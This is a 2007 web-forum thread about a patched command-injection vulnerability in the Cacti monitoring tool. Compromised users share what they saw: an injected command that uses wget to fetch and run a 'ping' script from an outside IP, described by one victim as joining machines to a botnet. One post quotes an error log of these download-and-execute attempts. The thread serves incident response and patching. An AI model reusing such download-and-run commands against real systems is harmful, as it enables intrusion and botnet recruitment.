|
|
| Author |
Message |
rony
Developer/Forum Admin
Joined: 17 Nov 2003
Posts: 5694
Location: Michigan, USA
|
 Posted: Wed Jan 03, 2007 4:58 pm Post subject: |
 |
|
| Patch will be released this week.
|
|
| Back to top |
|
 |
rony
Developer/Forum Admin
Joined: 17 Nov 2003
Posts: 5694
Location: Michigan, USA
|
| Posted: Mon Jan 08, 2007 10:34 am Post subject: |
|
|
Patches for this issue are now available for the following versions:
0.8.6i
0.8.6h
|
|
| Back to top |
|
|
roddie
Cacti User
Joined: 10 Feb 2004
Posts: 106
Location: Frisco, TX
|
| Posted: Tue Jan 09, 2007 3:15 pm Post subject: |
|
|
| Can someone update the main page and maybe post something to Announcements about the available patches?
|
|
| Back to top |
|
|
Makenshi
Joined: 08 Jun 2004
Posts: 26
|
| Posted: Tue Jan 09, 2007 3:18 pm Post subject: |
|
|
| My site just got hit. It looked like a brute force attack rather than using the link from the "Sites that use Cacti" page. I shall post the web server logs shortly. Luckily I caught it before any damage was done; however I shall be reimaging the server tomorrow.
|
|
| Back to top |
|
|
Makenshi
Joined: 08 Jun 2004
Posts: 26
|
| Posted: Tue Jan 09, 2007 4:04 pm Post subject: |
|
|
Please see the log excerpt attached.
| Description: |
|
Download |
| Filename: |
cacti-httpd-access_log.txt |
| Filesize: |
5.95 KB |
| Downloaded: |
1239 Time(s) |
|
|
| Back to top |
|
|
rony
Developer/Forum Admin
Joined: 17 Nov 2003
Posts: 5694
Location: Michigan, USA
|
| Posted: Tue Jan 09, 2007 4:11 pm Post subject: |
|
|
That's not the standard exploit.
Um... I will decode later to see what they where attempting to do. Thanks for the log.
|
|
| Back to top |
|
|
BigWillyStyle42
Joined: 14 Mar 2006
Posts: 11
|
| Posted: Tue Jan 09, 2007 11:59 pm Post subject: |
|
|
I think it's the same vulnerability, slightly different code but they're still injecting a command into the SQL database.
The command calls wget to get a ping script which it then calls and wget's some other things. A similar command was used on my machine, except they downloaded two images which were tar balls containing scripts and an httpd that connected my machine to an underworld botnet...
|
|
| Back to top |
|
|
Makenshi
Joined: 08 Jun 2004
Posts: 26
|
| Posted: Wed Jan 10, 2007 4:04 am Post subject: |
|
|
These are a couple of files I managed to retrieve in /etc/cron.d/, the exploit managed to start sshd running on [::]:80 and [::]:443.
| Description: |
|
Download |
| Filename: |
hack-attempt-cacti.tgz |
| Filesize: |
309.12 KB |
| Downloaded: |
617 Time(s) |
|
|
| Back to top |
|
|
Ning
Joined: 31 Aug 2006
Posts: 1
Location: Denmark
|
| Posted: Wed Jan 10, 2007 7:21 am Post subject: |
|
|
I've seen the same, but from a other ip.
If I try to convert it - it turns out to something like this.
and the ping file it got from 143.225.151.190
At this moment I'm very glad for SELinux
| Description: |
| ping file from the remote server |
|
Download |
| Filename: |
ping.txt |
| Filesize: |
731 Bytes |
| Downloaded: |
776 Time(s) |
| Description: |
|
Download |
| Filename: |
convert.txt |
| Filesize: |
1.09 KB |
| Downloaded: |
929 Time(s) |
| Description: |
|
Download |
| Filename: |
httplog.txt |
| Filesize: |
2.5 KB |
| Downloaded: |
824 Time(s) |
|
|
| Back to top |
|
|
rony
Developer/Forum Admin
Joined: 17 Nov 2003
Posts: 5694
Location: Michigan, USA
|
| Posted: Wed Jan 10, 2007 9:34 am Post subject: |
|
|
Interesting...
Glad I have a local firewall configured.. 
|
|
| Back to top |
|
|
TheWitness
Developer
Joined: 14 May 2002
Posts: 13135
Location: MI, USA
|
| Posted: Wed Jan 10, 2007 4:49 pm Post subject: |
|
|
Nasty, yet elegant exploit. It's rather scary.
TheWitness
|
|
| Back to top |
|
|
dvl
Joined: 15 Nov 2006
Posts: 16
Location: Warrington, PA
|
| Posted: Thu Jan 11, 2007 10:29 pm Post subject: Announce mailing list |
|
|
PLEASE! Someone post this to the announce mailing list. It needs wider attention.
I've just submitted a patch for the FreeBSD port.
|
|
| Back to top |
|
|
TheWitness
Developer
Joined: 14 May 2002
Posts: 13135
Location: MI, USA
|
| Posted: Thu Jan 11, 2007 11:41 pm Post subject: |
|
|
Done. Also, if you applied the patch and it broke your timespan selector. So long as you are not running the Timeshifter from Gandolf, you can apply the following file directly. I will correct the issue.
TheWitness
| Description: |
|
Download |
| Filename: |
inc_timespan_selector.zip |
| Filesize: |
1.61 KB |
| Downloaded: |
737 Time(s) |
|
|
| Back to top |
|
|
dvl
Joined: 15 Nov 2006
Posts: 16
Location: Warrington, PA
|
|
| Back to top |
|
|
lozzd
Joined: 08 Dec 2005
Posts: 30
|
| Posted: Sat Jan 13, 2007 11:29 am Post subject: |
|
|
I had the same as Ning.
However, I have the following in my error log:
| Code: | --05:54:11-- http://143.225.151.190/libsh/ping.txt
=> `ping.txt'
Connecting to 143.225.151.190:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 345 [text/plain]
ping.txt: Permission denied
Cannot write to `ping.txt' (Permission denied).
mv: cannot stat `ping.txt': No such file or directory
Can't open perl script "temp2006": No such file or directory
--05:54:11-- http://143.225.151.190/libsh/ping
=> `ping'
Connecting to 143.225.151.190:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15,808 [text/plain]
ping: Permission denied
Cannot write to `ping' (Permission denied).
chmod: cannot access `ping': No such file or directory
sh: ./ping: No such file or directory
sh: curl: command not found
chmod: cannot access `ping': No such file or directory
sh: ./ping: No such file or directory
|
Do you think that means nothing was affected? I can't see any evidence of it anyway. I've applied the fix now.. There should really be a way to tell everyone about that! Had I not have been checking through my error logs I wouldn't have known. [/code]
|
|
| Back to top |
|
|
|
FAQ
Search
Memberlist
Register
Profile
Log in to check your private messages
Log in
